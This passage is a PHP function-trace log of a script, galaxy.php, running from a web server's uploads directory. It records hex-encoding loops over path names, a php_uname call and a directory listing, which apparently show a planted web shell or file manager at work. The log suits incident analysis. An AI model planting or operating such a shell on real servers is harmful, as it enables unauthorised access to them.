3	504	0	0.018218	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	504	1	0.018229	481208
3	504	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	505	0	0.018258	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	505	1	0.018269	481176
3	505	R			111
3	506	0	0.018285	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	506	1	0.018297	481208
3	506	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	507	0	0.018326	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	507	1	0.018337	481176
3	507	R			97
3	508	0	0.018349	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	508	1	0.018360	481208
3	508	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	509	0	0.018389	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	509	1	0.018400	481176
3	509	R			100
3	510	0	0.018413	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	510	1	0.018424	481208
3	510	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	511	0	0.018452	481152	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	511	1	0.018464	481192
3	511	R			115
3	512	0	0.018476	481152	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	512	1	0.018487	481224
3	512	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	470	1	0.018516	481152
2	470	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	513	0	0.018531	481152	hex	1		/var/www/html/uploads/galaxy.php	68	1	'newDir'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	514	0	0.018562	481152	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	514	1	0.018573	481192
3	514	R			110
3	515	0	0.018585	481152	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	515	1	0.018596	481224
3	515	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	516	0	0.018625	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	516	1	0.018637	481224
3	516	R			101
3	517	0	0.018649	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	517	1	0.018660	481256
3	517	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	518	0	0.018689	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	518	1	0.018700	481224
3	518	R			119
3	519	0	0.018712	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	519	1	0.018723	481256
3	519	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	520	0	0.018752	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'D'
3	520	1	0.018763	481224
3	520	R			68
3	521	0	0.018775	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	68
3	521	1	0.018786	481256
3	521	R			'44'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '44'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	522	0	0.018820	481192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	522	1	0.018832	481232
3	522	R			105
3	523	0	0.018844	481192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	523	1	0.018855	481264
3	523	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	524	0	0.018884	481192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	524	1	0.018895	481232
3	524	R			114
3	525	0	0.018907	481192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	525	1	0.018918	481264
3	525	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	513	1	0.018947	481192
2	513	R			'6e6577446972'
2	526	0	0.018962	481072	php_uname	0		/var/www/html/uploads/galaxy.php	68	0
2	526	1	0.018976	481184
2	526	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	527	0	0.018999	481072	preg_split	0		/var/www/html/uploads/galaxy.php	89	2	'/(\\\\|\\/)/'	'/var/www/html/uploads'
2	527	1	0.019017	481672
2	527	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/galaxy.php	89	$ps = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/galaxy.php	90	$k = 0
1		A						/var/www/html/uploads/galaxy.php	90	$k = 1
1		A						/var/www/html/uploads/galaxy.php	96	$i = 0
2	528	0	0.019080	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	''
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
2	528	1	0.019110	481608
2	528	R			''
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	529	0	0.019131	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'var'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	530	0	0.019160	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	530	1	0.019171	481648
3	530	R			118
3	531	0	0.019184	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	531	1	0.019196	481680
3	531	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	532	0	0.019226	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	532	1	0.019237	481680
3	532	R			97
3	533	0	0.019250	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	533	1	0.019261	481712
3	533	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	534	0	0.019291	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	534	1	0.019302	481680
3	534	R			114
3	535	0	0.019315	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	535	1	0.019326	481712
3	535	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	529	1	0.019355	481640
2	529	R			'766172'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
1		A						/var/www/html/uploads/galaxy.php	90	$k = 2
1		A						/var/www/html/uploads/galaxy.php	96	$i = 0
2	536	0	0.019395	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	''
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
2	536	1	0.019424	481608
2	536	R			''
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	537	0	0.019445	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'var'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	538	0	0.019473	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	538	1	0.019485	481648
3	538	R			118
3	539	0	0.019496	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	539	1	0.019508	481680
3	539	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	540	0	0.019537	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	540	1	0.019548	481680
3	540	R			97
3	541	0	0.019560	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	541	1	0.019572	481712
3	541	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	542	0	0.019601	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	542	1	0.019613	481680
3	542	R			114
3	543	0	0.019625	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	543	1	0.019636	481712
3	543	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	537	1	0.019665	481640
2	537	R			'766172'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	544	0	0.019687	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'www'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	545	0	0.019719	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	545	1	0.019731	481648
3	545	R			119
3	546	0	0.019743	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	546	1	0.019754	481680
3	546	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	547	0	0.019784	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	547	1	0.019795	481680
3	547	R			119
3	548	0	0.019807	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	548	1	0.019818	481712
3	548	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	549	0	0.019846	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	549	1	0.019858	481680
3	549	R			119
3	550	0	0.019869	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	550	1	0.019881	481712
3	550	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	544	1	0.019909	481640
2	544	R			'777777'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
1		A						/var/www/html/uploads/galaxy.php	90	$k = 3
1		A						/var/www/html/uploads/galaxy.php	96	$i = 0
2	551	0	0.019948	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	''
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
2	551	1	0.019977	481608
2	551	R			''
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	552	0	0.019997	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'var'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	553	0	0.020025	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	553	1	0.020037	481648
3	553	R			118
3	554	0	0.020049	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	554	1	0.020060	481680
3	554	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	555	0	0.020090	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	555	1	0.020101	481680
3	555	R			97
3	556	0	0.020113	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	556	1	0.020125	481712
3	556	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	557	0	0.020154	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	557	1	0.020165	481680
3	557	R			114
3	558	0	0.020177	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	558	1	0.020189	481712
3	558	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	552	1	0.020218	481640
2	552	R			'766172'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	559	0	0.020238	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'www'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	560	0	0.020268	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	560	1	0.020279	481648
3	560	R			119
3	561	0	0.020291	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	561	1	0.020303	481680
3	561	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	562	0	0.020332	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	562	1	0.020343	481680
3	562	R			119
3	563	0	0.020355	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	563	1	0.020366	481712
3	563	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	564	0	0.020395	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	564	1	0.020406	481680
3	564	R			119
3	565	0	0.020421	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	565	1	0.020433	481712
3	565	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	559	1	0.020461	481640
2	559	R			'777777'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	566	0	0.020482	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'html'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	567	0	0.020511	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	567	1	0.020523	481648
3	567	R			104
3	568	0	0.020535	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	568	1	0.020546	481680
3	568	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	569	0	0.020575	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	569	1	0.020586	481680
3	569	R			116
3	570	0	0.020598	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	570	1	0.020609	481712
3	570	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	571	0	0.020639	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	571	1	0.020650	481680
3	571	R			109
3	572	0	0.020662	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	572	1	0.020673	481712
3	572	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	573	0	0.020702	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	573	1	0.020714	481680
3	573	R			108
3	574	0	0.020725	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	574	1	0.020737	481712
3	574	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	566	1	0.020766	481648
2	566	R			'68746d6c'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
1		A						/var/www/html/uploads/galaxy.php	90	$k = 4
1		A						/var/www/html/uploads/galaxy.php	96	$i = 0
2	575	0	0.020805	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	''
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
2	575	1	0.020834	481608
2	575	R			''
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	576	0	0.020868	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'var'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	577	0	0.020897	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	577	1	0.020909	481648
3	577	R			118
3	578	0	0.020921	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	578	1	0.020932	481680
3	578	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	579	0	0.020962	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	579	1	0.020973	481680
3	579	R			97
3	580	0	0.020985	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	580	1	0.020996	481712
3	580	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	581	0	0.021025	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	581	1	0.021037	481680
3	581	R			114
3	582	0	0.021049	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	582	1	0.021060	481712
3	582	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	576	1	0.021090	481640
2	576	R			'766172'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	583	0	0.021110	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'www'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	584	0	0.021144	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	584	1	0.021155	481648
3	584	R			119
3	585	0	0.021167	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	585	1	0.021179	481680
3	585	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	586	0	0.021208	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	586	1	0.021219	481680
3	586	R			119
3	587	0	0.021231	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	587	1	0.021242	481712
3	587	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	588	0	0.021271	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	588	1	0.021282	481680
3	588	R			119
3	589	0	0.021294	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	589	1	0.021334	481712
3	589	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	583	1	0.021366	481640
2	583	R			'777777'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	590	0	0.021387	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'html'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	591	0	0.021417	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	591	1	0.021428	481648
3	591	R			104
3	592	0	0.021440	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	592	1	0.021451	481680
3	592	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	593	0	0.021480	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	593	1	0.021491	481680
3	593	R			116
3	594	0	0.021503	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	594	1	0.021514	481712
3	594	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	595	0	0.021544	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	595	1	0.021555	481680
3	595	R			109
3	596	0	0.021567	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	596	1	0.021578	481712
3	596	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	597	0	0.021607	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	597	1	0.021619	481680
3	597	R			108
3	598	0	0.021631	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	598	1	0.021642	481712
3	598	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	590	1	0.021671	481648
2	590	R			'68746d6c'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	599	0	0.021693	481608	hex	1		/var/www/html/uploads/galaxy.php	97	1	'uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	600	0	0.021723	481608	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	600	1	0.021734	481648
3	600	R			117
3	601	0	0.021746	481608	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	601	1	0.021757	481680
3	601	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	602	0	0.021786	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	602	1	0.021797	481680
3	602	R			112
3	603	0	0.021809	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	603	1	0.021820	481712
3	603	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	604	0	0.021848	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	604	1	0.021859	481680
3	604	R			108
3	605	0	0.021871	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	605	1	0.021886	481712
3	605	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	606	0	0.021916	481640	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	606	1	0.021927	481680
3	606	R			111
3	607	0	0.021939	481640	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	607	1	0.021950	481712
3	607	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	608	0	0.021979	481648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	608	1	0.021990	481688
3	608	R			97
3	609	0	0.022002	481648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	609	1	0.022013	481720
3	609	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	610	0	0.022042	481648	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	610	1	0.022053	481688
3	610	R			100
3	611	0	0.022065	481648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	611	1	0.022076	481720
3	611	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	612	0	0.022104	481648	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	612	1	0.022116	481688
3	612	R			115
3	613	0	0.022127	481648	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	613	1	0.022139	481720
3	613	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	599	1	0.022168	481648
2	599	R			'75706c6f616473'
1		A						/var/www/html/uploads/galaxy.php	96	$i++
2	614	0	0.022192	481608	scandir	0		/var/www/html/uploads/galaxy.php	107	1	'/var/www/html/uploads'
2	614	1	0.022238	482232
2	614	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'galaxy.php', 5 => 'prepend.php']
2	615	0	0.022260	482200	array_diff	0		/var/www/html/uploads/galaxy.php	107	2	[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'galaxy.php', 5 => 'prepend.php']	[0 => '.', 1 => '..']
2	615	1	0.022281	482640
2	615	R			[2 => '.htaccess', 3 => 'data', 4 => 'galaxy.php', 5 => 'prepend.php']
1		A						/var/www/html/uploads/galaxy.php	107	$scD = [2 => '.htaccess', 3 => 'data', 4 => 'galaxy.php', 5 => 'prepend.php']
2	616	0	0.022315	482192	is_dir	0		/var/www/html/uploads/galaxy.php	109	1	'/var/www/html/uploads/.htaccess'
2	616	1	0.022334	482264
2	616	R			FALSE
2	617	0	0.022348	482224	is_dir	0		/var/www/html/uploads/galaxy.php	109	1	'/var/www/html/uploads/data'
2	617	1	0.022363	482264
2	617	R			TRUE
2	618	0	0.022376	482224	hex	1		/var/www/html/uploads/galaxy.php	110	1	'/var/www/html/uploads/data'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	619	0	0.022408	482224	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	619	1	0.022419	482264
3	619	R			47
3	620	0	0.022431	482224	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	620	1	0.022442	482296
3	620	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	621	0	0.022473	482256	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	621	1	0.022484	482296
3	621	R			118
3	622	0	0.022496	482256	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	622	1	0.022508	482328
3	622	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	623	0	0.022538	482256	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	623	1	0.022549	482296
3	623	R			97
3	624	0	0.022561	482256	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	624	1	0.022572	482328
3	624	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	625	0	0.022602	482256	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	625	1	0.022613	482296
3	625	R			114
3	626	0	0.022626	482256	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	626	1	0.022643	482328
3	626	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	627	0	0.022673	482264	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	627	1	0.022684	482304
3	627	R			47
3	628	0	0.022696	482264	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	628	1	0.022708	482336
3	628	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	629	0	0.022737	482264	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	629	1	0.022749	482304
3	629	R			119
3	630	0	0.022761	482264	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	630	1	0.022773	482336
3	630	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	631	0	0.022807	482264	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	631	1	0.022819	482304
3	631	R			119
3	632	0	0.022831	482264	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	632	1	0.022842	482336
3	632	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	633	0	0.022871	482264	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	633	1	0.022882	482304
3	633	R			119
3	634	0	0.022894	482264	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	634	1	0.022905	482336
3	634	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	635	0	0.022933	482272	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	635	1	0.022945	482312
3	635	R			47
3	636	0	0.022957	482272	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	636	1	0.022968	482344
3	636	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	637	0	0.022997	482272	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	637	1	0.023009	482312
3	637	R			104
3	638	0	0.023021	482272	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	638	1	0.023032	482344
3	638	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	639	0	0.023061	482272	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	639	1	0.023072	482312
3	639	R			116
3	640	0	0.023084	482272	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	640	1	0.023095	482344
3	640	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	641	0	0.023124	482272	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	641	1	0.023135	482312
3	641	R			109
